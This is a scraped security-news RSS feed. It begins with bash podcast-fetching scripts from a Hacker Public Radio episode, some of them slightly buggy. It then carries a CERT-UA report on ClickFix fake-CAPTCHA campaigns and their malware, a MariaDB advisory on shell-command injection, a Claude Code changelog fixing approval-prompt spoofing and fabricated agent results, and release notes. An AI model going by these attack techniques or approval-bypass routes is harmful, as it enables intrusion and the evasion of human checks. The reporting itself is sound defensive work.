
<p>
	# However, it is not as robust. If someone were to include the</p>

<p>
	# first grep search pattern in their show notes, then it would</p>

<p>
	# look for that as a valid tag and output the following text</p>

<p>
	# as a URL.</p>

<p>
	#wget --timeout=20 --tries=3 -O - "$PodURL" | grep "&lt;enclosure url=" \</p>

<p>
	#	| sed -n 's/^.*enclosure//p' | sed -n 's/^.*url=//p' \</p>

<p>
	#	| cut -d'"' -f2 | sort &gt; $tmppodsnew</p>

<p>

</p>

<p>

</p>

<p>
}</p>

<p>

</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Find which podcasts we do not already have.</p>

<p>
FindNewPodcasts () {</p>

<p>

</p>

<p>

</p>

<p>
	cat $podcastsfetched | sort &gt; $tmpoldurlssorted</p>

<p>
	comm -13 $tmpoldurlssorted $tmppodsnew &gt; $tmppodstodownload</p>

<p>

</p>

<p>
	rm $tmpoldurlssorted</p>

<p>

</p>

<p>
}</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Download the podcasts.</p>

<p>
DownloadPodcasts() {</p>

<p>

</p>

<p>
	# Clear out previous temporary list of downloaded podcasts.</p>

<p>
	true &gt; $tmppodcastsfetched</p>

<p>

</p>

<p>

</p>

<p>
	for i in $( cat $tmppodstodownload )</p>

<p>
	do</p>

<p>

</p>

<p>
		# Extract the file name from the URL.</p>

<p>
		fname=$( basename $i )</p>

<p>
		outputpodname="$podfilepath/$fname"</p>

<p>

</p>

<p>
		# Download the file.</p>

<p>
		wget --timeout=90 --tries=3 -P $podfilepath $i -O "$outputpodname"</p>

<p>

</p>

<p>
		# Check if the file exists and is not empty.</p>

<p>
		if [[ -s "$outputpodname" ]]; then</p>

<p>
			echo $i &gt;&gt; $tmppodcastsfetched</p>

<p>
		else</p>

<p>
			echo "$podttimestamp Error - $outputpodname was not found or is empty." &gt;&gt; $tmppodserrors</p>

<p>
		fi</p>

<p>

</p>

<p>

</p>

<p>
		# Delay a reasonable length of time between multiple downloads.</p>

<p>
		if (( $PodCount &gt; 1 )); then </p>

<p>
			sleep 3</p>

<p>
		fi</p>

<p>

</p>

<p>
	done</p>

<p>

</p>

<p>
	# Add the list of files downloaded to the log.</p>

<p>
	# Check if the list exists and is not empty.</p>

<p>
	if [ -s $tmppodcastsfetched ]; then</p>

<p>
		cat $tmppodcastsfetched &gt;&gt; $podcastsfetched</p>

<p>
		# Trim the log file to keep it from growing indefinitely.</p>

<p>
		tail -n50 $podcastsfetched &gt; $tmplog</p>

<p>
		mv $tmplog $podcastsfetched</p>

<p>
	fi</p>

<p>

</p>

<p>
	# Remove the tmp file now that we are done with it.</p>

<p>
	rm $tmppodcastsfetched</p>

<p>

</p>

<p>
}</p>

<p>

</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Clean up any left over files.</p>

<p>
CleanupFiles "$tmppodsnew" "$tmppodstodownload" "$tmppodserrors" "$tmppodcastsfetched"</p>

<p>

</p>

<p>

</p>

<p>
# Get the RSS data.</p>

<p>
GetRSSURLData</p>

<p>

</p>

<p>
# Find which podcasts are new.</p>

<p>
FindNewPodcasts</p>

<p>

</p>

<p>
# Count how many new podcasts there are.</p>

<p>
PodCount=$( cat $tmppodstodownload | wc -l )</p>

<p>

</p>

<p>

</p>

<p>
# If no podcasts to download, skip this.</p>

<p>
# If too many podcasts for this feed, then log an error and skip.</p>

<p>
# This error will keep repeating until something is done about it.</p>

<p>
if (( $PodCount &gt; 0 )); then </p>

<p>
	if (( $PodCount &gt; $DownloadLimit )); then </p>

<p>
		echo "$podttimestamp Too many podcasts for $PodName : $PodCount." &gt;&gt; $tmppodserrors		</p>

<p>
	else</p>

<p>
		# Download the podcasts listed in the temp file.</p>

<p>
		DownloadPodcasts</p>

<p>
	fi</p>

<p>
fi</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Copy the errors log from the temporary errors file to the permanent files.</p>

<p>
LogErrors</p>

<p>

</p>

<p>
# Clean up temp files.</p>

<p>
CleanupFiles "$tmppodsnew" "$tmppodstodownload" "$tmppodserrors" "$tmppodcastsfetched"</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
END OF FIRST SHELL SCRIPT</p>

<p>

</p>

<p>

</p>

<p>
START OF SECOND SHELL SCRIPT</p>

<p>

</p>

<p>
podfetchnotify</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>
#!/bin/bash</p>

<p>

</p>

<p>
# Part of Podfetch.</p>

<p>
# This monitors for new files appearing in the new podcasts directory.</p>

<p>
# This should be run as a background task.</p>

<p>
# Install it using the "Startup Applications" utility in Ubuntu.</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Path where new podcasts are to be stored.</p>

<p>
podfilepath="/home/me/Music/Podcasts/HPR"</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Wait for the podcast directory to be modified.</p>

<p>
while true; do</p>

<p>

</p>

<p>
	# Check for new files.</p>

<p>
	errmsg=$( inotifywait -e modify -e create -e moved_to $podfilepath )</p>

<p>
	result=$?</p>

<p>

</p>

<p>

</p>

<p>
	# Check if exited due to new podcast, or if some error.</p>

<p>
	if (( result == 0 )); then</p>

<p>
		# Success, signal new podcast.</p>

<p>
		notify-send "New HPR podcast available."</p>

<p>
	else</p>

<p>
		# Check to make sure the directory exists.</p>

<p>
		# If it doesn't exist, there isn't much we can do to fix it.</p>

<p>
		if [ ! -e "$poderrorspath" ]; then</p>

<p>
			notify-send "Podfetch error: Podcast directory not found $poderrorspath"</p>

<p>
			exit 1</p>

<p>
		fi</p>

<p>
	fi</p>

<p>

</p>

<p>
	# Wait a bit so that multiple new files don't keep re-triggering the notification.</p>

<p>
	sleep 60</p>

<p>

</p>

<p>
done</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
END OF SECOND SHELL SCRIPT</p>

<p>

</p>

<p>

</p>

<p>
START OF THIRD SHELL SCRIPT</p>

<p>

</p>

<p>
podfetcherror</p>

<p>
Created Tuesday 23 June 2026</p>

<p>

</p>

<p>
#!/bin/bash</p>

<p>

</p>

<p>
# Part of Podfetch.</p>

<p>
# This monitors the Podfetch error reporting file for new errors.</p>

<p>
# This should be run as a background task.</p>

<p>
# Install it using the "Startup Applications" utility in Ubuntu.</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Where the Podfetch program error report file is located.</p>

<p>
poderrorspath="/home/me/Apps/hprfetch"</p>

<p>

</p>

<p>
# The full path and file name.</p>

<p>
poderrorsreport="$poderrorspath/poderrorsreport.txt"</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>
# Error counter.</p>

<p>
errcount=0</p>

<p>

</p>

<p>
# Wait for the poderrorsreport file to be modified.</p>

<p>
while true; do</p>

<p>

</p>

<p>
	errmsg=$( inotifywait -e modify $poderrorsreport )</p>

<p>
	result=$?</p>

<p>

</p>

<p>
	# Wait a bit to ensure that writing to the file is complete.</p>

<p>
	sleep 3</p>

<p>

</p>

<p>
	if (( result == 0 )); then</p>

<p>
		# Get the latest error message.</p>

<p>
		# Cut out the date stamp at the start of the line and take the rest.</p>

<p>
		poderr=$( tail -n $poderrorsreport | cut -d" " -f2- )</p>

<p>

</p>

<p>
		notify-send "Podfetch error: $poderr"</p>

<p>

</p>

<p>
		# Reset the error counter every time there is a successful result.</p>

<p>
		errcount=0</p>

<p>

</p>

<p>
	else</p>

<p>
		# Check to make sure the directory exists.</p>

<p>
		if [ ! -e "$poderrorspath" ]; then</p>

<p>
			notify-send "Podfetch error: error report path not found $poderrorspath"</p>

<p>
			exit 1</p>

<p>
		fi</p>

<p>

</p>

<p>
		# Check if the file we are trying to monitor exists.</p>

<p>
		# If not, then create an empty file for error signaling.</p>

<p>
		if [ ! -e "$poderrorsreport" ]; then</p>

<p>
			echo &gt; $poderrorsreport</p>

<p>
		fi</p>

<p>

</p>

<p>
		# Increment the error counter.</p>

<p>
		count=$(( count + 1 ))</p>

<p>
		if (( count &gt; 3 )); then</p>

<p>
			notify-send "Podfetch error: Excessive unknown errors, exiting."</p>

<p>
			exit 1</p>

<p>
		fi</p>

<p>

</p>

<p>
	fi</p>

<p>

</p>

<p>
done</p>

<p>

</p>

<p>
# ======================================================================</p>

<p>

</p>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4688/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by Debian (kernel, libnfs, roundcube, and tiff), Fedora (antlr4-project, chromium, erlang, libseccomp, libtiff, log4cxx, mbedtls, node-exporter, opam, openssh, proftpd, python-asyncssh, python-django5, python-libcst, python-orjson, python-uv-build, ruby, rust-ast...]]></description>
<link>https://tsecurity.de/de/3681213/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681213/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 20 Jul 2026 15:10:28 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (kernel, libnfs, roundcube, and tiff), <b>Fedora</b> (antlr4-project, chromium, erlang, libseccomp, libtiff, log4cxx, mbedtls, node-exporter, opam, openssh, proftpd, python-asyncssh, python-django5, python-libcst, python-orjson, python-uv-build, ruby, rust-astral_async_zip, spoofdpi, uv, and yq), <b>Mageia</b> (bind, clamav, erlang, libidn, libreoffice, nmap, nodejs, perl-Bytes-Random-Secure, perl-Config-IniFiles, perl-CSS-Minifier-XS, perl-HTML-Parser, perl-Mojolicious, perl-String-Util, python-pydantic-settings, rsync, and upower), <b>Oracle</b> (.NET 10.0, .NET 8.0, .NET 9.0, bind, cockpit, cockpit-image-builder, coreutils, delve, dnsmasq, dovecot, expat, fence-agents, flatpak, frr, gdk-pixbuf2, giflib, glib2, go-fdo-client and go-fdo-server, golang-github-openprinting-ipp-usb, grafana, grafana-pcp, httpd, jq, kernel, keylime, krb5, libcap, libexif, libpng, libsndfile, libsolv, libsoup3, libtasn1, libtiff, libxslt, libyang, mariadb10.11, mod_http2, mod_md, opencryptoki, PackageKit, perl-Archive-Tar, perl-IO-Compress, poppler, postfix, postgresql-jdbc, python-urllib3, python3.14, python3.14-pip, python3.14-urllib3, qt6-qtdeclarative, rrdtool, rsync, ruby, ruby4.0, samba, skopeo, thunderbird, valkey, wireshark, xorg-x11-server-Xwayland, and yggdrasil-worker-package-manager), and <b>SUSE</b> (blender, chromium, containerized-data-importer1, cyrus-imapd, go1.26-openssl, gomuks, grafana, gstreamer-plugins-bad, kbfs, kubevirt1.8-container-disk, libxml2, lux, mariadb-connector-c, nginx, opam, openssl-3, oras, perl-DBI, php-composer2, python-django-haystack, python-paramiko, python-weasyprint, python311, python313-Pillow, python315, shibboleth-sp, system-user-zabbix, and wget).]]></content:encoded>
</item>
<item>
<title><![CDATA[ClickFix Attacks Drive UAC-0145 Cyber Campaigns, CERT-UA Warns]]></title>
<description><![CDATA[The ClickFix attacks technique has become a key initial access method for the UAC-0145 cyber threat cluster, according to a new report from Ukraine's Computer Emergency Response Team (CERT-UA). The agency said the threat group, also tracked as Sandworm, APT44, Seashell Blizzard, and a subcluster ...]]></description>
<link>https://tsecurity.de/de/3675937/it-security-nachrichten/clickfix-attacks-drive-uac-0145-cyber-campaigns-cert-ua-warns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675937/it-security-nachrichten/clickfix-attacks-drive-uac-0145-cyber-campaigns-cert-ua-warns/</guid>
<pubDate>Fri, 17 Jul 2026 13:54:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="ClickFix Attacks" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks.webp 1536w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks.webp 1536w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/ClickFix-Attacks-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="ClickFix Attacks Drive UAC-0145 Cyber Campaigns, CERT-UA Warns 3"></p><p class="PDq2pG_selectionAnchorContainer" data-start="390" data-end="851">The ClickFix attacks technique has become a key initial access method for the UAC-0145 cyber threat cluster, according to a new report from Ukraine's Computer Emergency Response Team (<a href="https://thecyberexpress.com/cert-ua-warns-of-darkcrystal-rat/" target="_blank" rel="noopener">CERT-UA</a>). The agency said the threat group, also tracked as Sandworm, <a href="https://thecyberexpress.com/alleged-ddos-attack-on-denmark/" target="_blank" rel="noopener">APT44</a>, Seashell Blizzard, and a subcluster of UAC-0002, has shifted its tactics during 2026, increasingly relying on <a href="https://thecyberexpress.com/google-recaptcha-trojanized-by-russian-hackers/" target="_blank" rel="noopener">fake CAPTCHA prompts</a> and social engineering to compromise systems.</p>
<p data-start="853" data-end="1196">CERT-UA said it has worked with Ukrainian cybersecurity agencies for several years to investigate the activities of UAC-0145. While the group previously relied on infected software installers distributed through torrent websites, recent campaigns have increasingly used ClickFix to trick users into executing malicious PowerShell commands.</p>

<h3 data-section-id="4rdrqx" data-start="1198" data-end="1255"><strong><span role="text">ClickFix Attacks Emerging as Primary Initial Access Vector</span></strong></h3>
<p data-start="1257" data-end="1565"><a href="https://cert.gov.ua/article/6318437" target="_blank" rel="nofollow noopener">According to CERT-UA</a>, infections recorded during the spring and summer of 2026 frequently began when victims visited compromised websites displaying fake CAPTCHA pages. Users were instructed to copy and execute PowerShell commands in their terminal, a <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-phishing/" target="_blank" rel="noopener" title="phishing" data-wpil-keyword-link="linked" data-wpil-monitor-id="29024">phishing</a> technique commonly referred to as ClickFix.</p>
<p data-start="1567" data-end="1765">The downloaded commands were designed to retrieve malicious files such as GHETTOVIBE, a Visual Basic Script (VBS) that establishes persistence by placing itself in the Windows Startup directory.</p>
<p data-start="1767" data-end="2036">Once executed, attackers could deploy SCOUTCURL, a PowerShell reconnaissance tool capable of collecting information about the compromised system, including device specifications, installed software, browser <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="29022">data</a>, and local files before exfiltrating the information.</p>
<p data-start="2038" data-end="2186">CERT-UA also observed <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-malware/" title="malware" data-wpil-keyword-link="linked" data-wpil-monitor-id="29017">malware</a> loaders including FLUIDLEECH, disguised as antivirus software, and LOADLOOP being used during these campaigns.</p>

<h3 data-section-id="1n2nqi8" data-start="2188" data-end="2241"><strong><span role="text">Backdoors and Data Theft Tools Widely Deployed</span></strong></h3>
<p data-start="2243" data-end="2395">The report noted that attackers continue using <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-malware/" target="_blank" rel="noopener" title="malware" data-wpil-keyword-link="linked" data-wpil-monitor-id="29025">malware</a> families such as KALAMBUR, SUMBUR, and TAMBUR after gaining access to victim systems.</p>
<p data-start="2397" data-end="2595">To maintain <a href="https://thecyberexpress.com/intellexa-remote-access-to-customer-systems/" target="_blank" rel="noopener">remote access</a>, the group relied on legitimate utilities including OpenSSH and Tor, forwarding local network ports such as 445, 3389, and 22 to attacker-controlled infrastructure.</p>
<p data-start="2597" data-end="2754">CERT-UA also found malware designed to steal messaging data from Signal and <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-to-do-if-and-when-your-whatsapp-is-hacked/" title="WhatsApp" data-wpil-keyword-link="linked" data-wpil-monitor-id="29019">WhatsApp</a>, with stolen information reportedly exfiltrated using RSYNC.</p>
<p data-start="2756" data-end="2993">On infected systems examined during <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="29023">cyber</a> defense operations, investigators additionally identified FREAKYPOLL, a Python-based backdoor distributed as compiled bytecode (.pyc), providing attackers with persistent unauthorized access.</p>

<h2 data-section-id="1s2gyff" data-start="2995" data-end="3057"><span role="text"><strong data-start="2998" data-end="3057">Compromised Websites Used to Deliver Fake CAPTCHA Pages</strong></span></h2>
<p data-start="3059" data-end="3171">During June and July 2026, CERT-UA analyzed more than ten compromised websites involved in <strong data-start="3150" data-end="3170">ClickFix attacks</strong>.</p>
<p data-start="3173" data-end="3516">Investigators found attackers using both the <strong data-start="3218" data-end="3236">Cloaking.House</strong> service and custom malware called <strong data-start="3271" data-end="3283">SMARTAXE</strong> to dynamically modify legitimate webpages. SMARTAXE retrieves remote domains from blockchain smart contracts through Ethereum's <strong data-start="3412" data-end="3424">eth_call</strong> function before displaying fake CAPTCHA pages or redirecting visitors to malicious content.</p>
<p data-start="3518" data-end="3773">CERT-UA warned that any website used in these attacks should be considered compromised, potentially through vulnerable content management systems (CMS), stolen credentials, web shells, malicious plugins, modified website scripts, or server-side backdoors.</p>
<p data-start="3775" data-end="3908">The agency urged website administrators and hosting providers to strengthen website <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="security" data-wpil-keyword-link="linked" data-wpil-monitor-id="29018">security</a> and respond quickly to incident reports.</p>

<h3 data-section-id="xet64s" data-start="3910" data-end="3965"><span role="text"><strong data-start="3913" data-end="3965">Android Malware Also Part of UAC-0145 Operations</strong></span></h3>
<p data-start="3967" data-end="4069">The report also highlighted growing use of Android malware distributed through messaging applications.</p>
<p data-start="4071" data-end="4338">Attackers were observed sharing APK files disguised as security or antivirus tools. One such malware family, tracked as COWARDDUCK, functions as a full-featured Android backdoor capable of collecting device information, contacts, files, and real-time geolocation.</p>
<p data-start="4340" data-end="4527">The malware targets files from directories including DCIM, Documents, Downloads, Pictures, and Alarms while searching for formats such as DOCX, XLSX, PPTX, ZIP, RAR, JSON, and OVPN files.</p>
<p data-start="4529" data-end="4744">According to CERT-UA, COWARDDUCK uploads stolen files through the Dropbox API while receiving commands from legitimate services including Steam Community and StockMemory domains through proxy infrastructure.</p>

<h3 data-section-id="1o8fspw" data-start="4746" data-end="4801"><span role="text"><strong data-start="4749" data-end="4801">Microsoft Sees Global Rise in ClickFix Campaigns</strong></span></h3>
<p data-start="4803" data-end="5026">Microsoft Threat Intelligence and Microsoft Defender Experts also <a href="https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/" target="_blank" rel="nofollow noopener">reported</a> that ClickFix campaigns have increased significantly since early 2024, targeting thousands of enterprise and consumer devices globally each day.</p>
<p data-start="5028" data-end="5345">Microsoft said the technique commonly delivers malware such as Lumma <a class="wpil_keyword_link" href="https://cyble.com/stealer/" target="_blank" rel="noopener" title="Stealer" data-wpil-keyword-link="linked" data-wpil-monitor-id="29020">Stealer</a> by persuading users to copy and execute commands through Windows Run, Windows Terminal, or Windows PowerShell. The campaigns are often combined with phishing, malvertising, and drive-by compromise techniques that imitate trusted brands.</p>
<p data-start="5347" data-end="5605">Because ClickFix attacks rely on user interaction rather than exploiting software <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-vulnerabilities/" title="vulnerabilities" data-wpil-keyword-link="linked" data-wpil-monitor-id="29021">vulnerabilities</a> directly, Microsoft recommends organizations strengthen user awareness and apply security policies that restrict unnecessary use of command execution tools.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in rsync (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3672352/unix-server/security-mehrere-probleme-in-rsync-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672352/unix-server/security-mehrere-probleme-in-rsync-fedora/</guid>
<pubDate>Thu, 16 Jul 2026 06:46:04 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.211]]></title>
<description><![CDATA[What's changed

Added --forward-subagent-text flag and CLAUDE_CODE_FORWARD_SUBAGENT_TEXT environment variable to include subagent text and thinking in stream-json output
Fixed permission previews relayed to chat channels not neutralizing bidirectional-override, zero-width, and look-alike quote ch...]]></description>
<link>https://tsecurity.de/de/3672066/downloads/v21211/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672066/downloads/v21211/</guid>
<pubDate>Thu, 16 Jul 2026 01:16:22 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Added <code>--forward-subagent-text</code> flag and <code>CLAUDE_CODE_FORWARD_SUBAGENT_TEXT</code> environment variable to include subagent text and thinking in stream-json output</li>
<li>Fixed permission previews relayed to chat channels not neutralizing bidirectional-override, zero-width, and look-alike quote characters, so tool inputs cannot visually alter the approval message</li>
<li>Fixed auto mode overriding a PreToolUse hook's <code>ask</code> decision for unsandboxed Bash — a hook <code>ask</code> now floors the decision at a prompt</li>
<li>Fixed parallel Claude Code sessions all logging out simultaneously after wake-from-sleep when many sessions share one credential store</li>
<li>Fixed plugin MCP servers not reconnecting after an idle web session woke, leaving MCP calls failing until the next message</li>
<li>Fixed Claude Code on Vertex and Bedrock attempting the default Opus model at startup and printing a spurious fallback notice when a model is explicitly configured</li>
<li>Fixed subagents spawned with an explicit model override reverting to the parent's model when resumed or sent a follow-up message</li>
<li>Fixed nested <code>.claude/rules/*.md</code> files loading even when setting sources exclude project settings</li>
<li>Fixed file upload validation: filenames ending in a DOS device suffix (<code>.prn</code>) or trailing dot are now accepted, and files with multiple hard links are refused</li>
<li>Fixed file uploads to Claude in Chrome from remote and CLI sessions</li>
<li>Fixed edits that leave the input as "?" being silently swallowed and toggling the shortcuts panel</li>
<li>Fixed a startup hang when the Claude in Chrome extension is enabled but Chrome is not running</li>
<li>Fixed a 300ms delay revealing async content (Settings tabs, Stats, diff views, and other loading states)</li>
<li>Fixed reopening a just-stopped background session from the agents view starting a blank conversation under the same session id</li>
<li>Fixed <code>/loop</code> hiding the session from <code>/resume</code> after a single use</li>
<li>Fixed screen reader users losing the audible terminal bell after <code>/terminal-setup</code> or onboarding terminal setup</li>
<li>Fixed background jobs on LLM gateway auth (<code>ANTHROPIC_AUTH_TOKEN</code> + <code>ANTHROPIC_BASE_URL</code>) coming back "Not logged in" after the daemon respawns them</li>
<li>Fixed <code>claude agents</code> jobs becoming permanently undeletable when git no longer recognizes their worktree — the row now shows why the delete was refused instead of silently reappearing</li>
<li>Fixed <code>/clear</code> not resetting the session cost counter — the statusline's cost now starts at $0 after <code>/clear</code></li>
<li>Fixed Claude in Chrome setup pages failing to open in the browser on Windows</li>
<li>Fixed headless print-mode sessions on Windows crashing or silently exiting when stdin is unreadable</li>
<li>Fixed background session titles in the agents view showing the naming model's refusal text when the prompt contains a link</li>
<li>Fixed background agents killed by the user auto-respawning, and revived agents re-running stale prompts from old sessions</li>
<li>Fixed routines with no schedule reporting a next run time in the year 1</li>
<li>Hardened synced skill/plugin directory naming on Windows and kept CCR web fetch/search proxies working after <code>/clear</code></li>
<li>Improved terminal layout and rendering performance</li>
<li>Improved background agent result reporting — Claude now reports the status of still-running agents and waits for the real completion instead of fabricating results</li>
<li>Improved the memory index over-limit warning to measure only loaded content, excluding frontmatter and HTML comments</li>
<li>Updated integer environment variables (timeouts, token budgets, retry counts) to accept scientific notation and digit-separator spellings like <code>1e6</code> and <code>64_000</code></li>
<li>Updated documentation links to the current docs sites</li>
<li>Changed "always allow" permission rules to save at the repository root, so approvals granted in a git worktree persist across sessions and worktrees</li>
<li>Changed <code>/usage-credits</code> to ask for confirmation before sending a request to organization admins</li>
<li>Changed Vim mode <code>s</code> and <code>S</code> (substitute char/line) to work in NORMAL mode, matching vim behavior</li>
<li>[VSCode] Updated the Remote Control banner to describe what it does</li>
<li>Claude in Chrome: hardened file-upload path validation</li>
<li>Claude in Chrome: <code>save_to_disk</code> on screenshot actions now writes the image to disk and returns the path; previously it did nothing</li>
<li>Fixed a prompt-caching regression on Bedrock, Vertex, Mantle, and Foundry that billed the trailing system context block as fresh input tokens on every request.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8536-1: MariaDB vulnerabilities]]></title>
<description><![CDATA[It was discovered that MariaDB did not properly validate parameters
supplied by a joiner node during a State Snapshot Transfer using the
mariabackup method. An attacker could possibly use this issue to execute
arbitrary shell commands on the donor node. (CVE-2026-44168)

It was discovered that Ma...]]></description>
<link>https://tsecurity.de/de/3668045/unix-server/usn-8536-1-mariadb-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668045/unix-server/usn-8536-1-mariadb-vulnerabilities/</guid>
<pubDate>Tue, 14 Jul 2026 15:16:48 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that MariaDB did not properly validate parameters
supplied by a joiner node during a State Snapshot Transfer using the
mariabackup method. An attacker could possibly use this issue to execute
arbitrary shell commands on the donor node. (CVE-2026-44168)

It was discovered that MariaDB did not properly enforce the SHOW CREATE
ROUTINE privilege when a user obtained access to a stored routine via a
role. An authenticated user could possibly use this issue to obtain
sensitive information. (CVE-2026-44169)

It was discovered that MariaDB's mbstream utility did not properly validate
paths when unpacking archives. An attacker could possibly use this issue to
write files outside of the intended target directory. (CVE-2026-44171)

It was discovered that MariaDB's mysql_real_escape_string() function
incorrectly handled the big5 character set. An attacker could possibly use
this issue to perform SQL injection attacks. (CVE-2026-44172)

It was discovered that MariaDB did not properly check the FILE privilege
when the FROM clause of a SELECT ... INTO OUTFILE or SELECT ... INTO
DUMPFILE statement contained only subqueries. An authenticated user could
possibly use this issue to write files to unintended locations.
(CVE-2026-44173)

It was discovered that MariaDB did not properly validate parameters
supplied by a joiner node during a State Snapshot Transfer using the rsync
method. An attacker could possibly use this issue to execute arbitrary
shell commands on the donor node. (CVE-2026-48163)

It was discovered that MariaDB allowed a high-privileged user to set
certain Galera system variables to values containing shell commands, which
were then executed by the server process. An authenticated user could
possibly use this issue to execute arbitrary shell commands.
(CVE-2026-48165)

It was discovered that MariaDB executed shell commands embedded in the name
of a joiner node when wsrep_notify_cmd was enabled. A remote attacker could
possibly use this issue to execute arbitrary shell commands.
(CVE-2026-49261)]]></content:encoded>
</item>
<item>
<title><![CDATA[v1.25.3]]></title>
<description><![CDATA[Installation
See the installation instructions for details, but it's easy:

macOS: brew install ddev/ddev/ddev or just brew upgrade ddev.
Linux: Use sudo apt-get update && sudo apt-get install ddev, see apt/yum installation
Windows and WSL2: Download the Windows Installer; you can run it for inst...]]></description>
<link>https://tsecurity.de/de/3649770/downloads/v1253/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649770/downloads/v1253/</guid>
<pubDate>Mon, 06 Jul 2026 22:01:36 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Installation</h2>
<p>See the <a href="https://docs.ddev.com/en/stable/users/install/ddev-installation/" rel="nofollow">installation instructions</a> for details, but it's easy:</p>
<ul>
<li>macOS: <code>brew install ddev/ddev/ddev</code> or just <code>brew upgrade ddev</code>.</li>
<li>Linux: Use <code>sudo apt-get update &amp;&amp; sudo apt-get install ddev</code>, see <a href="https://docs.ddev.com/en/stable/users/install/ddev-installation/#linux" rel="nofollow">apt/yum installation</a></li>
<li>Windows and WSL2: Download the <a href="https://ddev.com/download/" rel="nofollow">Windows Installer</a>; you can run it for install or upgrade.<br>
<g-emoji class="g-emoji" alias="warning">⚠️</g-emoji> <strong>Traditional Windows users (not WSL2)</strong>: If needed, the installer will prompt you to uninstall the previous system-wide installation to avoid conflicts with the new per-user installation.</li>
<li>Consider <code>ddev delete images</code> or <code>ddev delete images --all</code> after upgrading to free up disk space used by previous Docker image versions. This does no harm.</li>
<li>Consider <code>ddev config --auto</code> to update your projects to current configuration.</li>
</ul>
<h2>Highlights</h2>
<p>Blog announcement: <a href="https://ddev.com/blog/release-v1-25-3/" rel="nofollow">https://ddev.com/blog/release-v1-25-3/</a></p>
<ul>
<li><strong>New Docker Compose library:</strong> Improved UX during <code>ddev start</code> and <code>ddev stop</code>; the separate <code>~/.ddev/bin/docker-compose</code> binary is no longer needed and can be removed</li>
